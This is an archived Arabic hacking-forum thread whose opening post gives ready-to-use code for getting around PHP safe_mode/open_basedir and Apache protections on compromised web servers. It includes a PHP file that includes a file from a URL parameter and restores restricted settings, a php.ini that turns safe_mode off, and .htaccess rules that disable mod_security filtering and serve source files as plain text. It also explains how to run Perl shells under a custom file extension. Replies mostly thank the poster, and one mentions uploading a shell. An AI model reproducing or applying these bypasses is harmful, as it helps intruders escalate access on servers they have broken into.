:: vBspiders Professional Network ::
صفحة 1 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز (http://www.vbspiders.com/vb/t66406.html)

ReD-HaT 12-31-2012 05:01 AM
الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
السلام عليكم و رحمة الله تعالى و بركاته
أنا جمعت بعض الأكواد ان شاء الله تفيدكم
هنالك فرق في التخطي
الأول هو التخطي السيف مود و يكون في اصدارات php
مثال هدا الكود في ini.php
كود PHP:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
و كدلك ملف php.ini
كود PHP:
short_open_tag On
log_errors On
log_errors_max_len 1024
ignore_repeated_errors On
register_globals Off
magic_quotes_runtime Off
magic_quotes_gpc On
allow_url_fopen on
AddHandler application/x-httpd-php4 .php
display_errors Off
disable_functions Bypass By ReD
safe_mode Off 
ملاحظة : هده الطريقة لا تتخطى جميع الاصدارات
لكن تتخطى في كثير من الأحيان
نجي الأن ما يخص تخطي apache الاباتشي أو ليتسبيد
لما نريد عمل اختصار مجلد أو عمل سملنك لملف معين
يطلع معانا خطأ Forbidden + Internal Server Error + 406 not acceptable
نسوي هتاكسس و نشوف هدا الكود
كود PHP:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule
DirectoryIndex seees.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddType text/plain .pl
AddType text/plain .asp
AddType text/plain .htm
AddType text/plain .shtml
AddType text/plain .shtm
AddType text/plain .htaccess
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html 
نجي نحلل هدا الهتاكسس
هدا بيتخطى كثير الفوربدن
كود PHP:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html 
أما بالنسبة ل 406 not acceptablr
فالحل هو هدا
كود PHP:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule
أما Internal Server Error
فهدا الكود بيتخطاه
كود PHP:
DirectoryIndex seees.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddType text/plain .pl
AddType text/plain .asp
AddType text/plain .htm
AddType text/plain .shtml
AddType text/plain .shtm
AddType text/plain .htaccess 
اه كمان شئ مهم
مثلا لو أريد تشغيل البيرل كمثال في السرفر
رح أحط مثلا في الهتاكسس هون AddType application/x-httpd-cgi.red
مع انشاء ملف اخر بيرل يكون shellperl.red
ما الى هدا هناك طرق كثييييرة جدا في التخطي
و ارجو من الشباب التفريق ما بين هدان الأمرين
والله ولي التوفيق
سلام

GHOST HACKERS 12-31-2012 05:22 AM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
بارك الله فيك .....................

hanoo 12-31-2012 06:33 AM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
بارك الله فيك .. درس مهم

ABDOLINKIN 12-31-2012 06:11 PM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
بارك الله فيك+++++++++

سفاح العنزي 12-31-2012 10:47 PM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
بصراحة شرررح روعهه ومضمون أروع , أشكرك على هذا التنبيه

الله يوفقك شكراً

خالد سعودي 01-01-2013 02:15 AM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
جاري الحفظ تسلم

خالد سعودي 01-01-2013 04:18 AM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
اخي الكريم مانفع معي الطريقة في السيرفر عندي رفع عليه شل حتى البيرل ايشتغل معي ولكن بحربه في مواقع ثانية

MaFia 01-01-2013 01:37 PM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
بارك الله فيك
لكن ملحوظه صغيره في مشكلة
اقتباس:
Internal Server Error
اعتقد انها مش هتظبط على كل السيرفرات

لان الروت في الغالب\
بيمنع
option all
و
DirectoryIndex

ReD-HaT 01-01-2013 09:27 PM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
اقتباس:
المشاركة الأصلية كتبت بواسطة خالد سعودي (المشاركة 457112)
اخي الكريم مانفع معي الطريقة في السيرفر عندي رفع عليه شل حتى البيرل ايشتغل معي ولكن بحربه في مواقع ثانية
والله ما فهمت قصدك وضح أكثر

ReD-HaT 01-01-2013 09:31 PM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Cyber Mafia (المشاركة 457122)
بارك الله فيك
لكن ملحوظه صغيره في مشكلة

اعتقد انها مش هتظبط على كل السيرفرات

لان الروت في الغالب\
بيمنع
option all
و
DirectoryIndex
اه طبعا مو رح تضبط في كل السرفرات
و غالبا سرفرات ovh , gator
ولكن لكل حماية اختراق
مشكورين على المرور

S!l3nT_Sm!l3 01-03-2013 05:51 AM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
مشكوووووووور أخي الغالي

InJuries Yemen 01-03-2013 11:34 AM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
بارك الله فيك اخوي درسس جميل بتوفيق ان شاءالله

Injection 01-13-2013 04:12 PM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
موضوع مميز حقيقة
بارك الله فيك

hisocker 01-17-2013 02:25 AM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
بارك الله فيك ..

samourai_7 02-13-2013 09:35 PM
رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز
 
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية


الساعة الآن 09:46 PM
صفحة 1 من 2 1 2
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0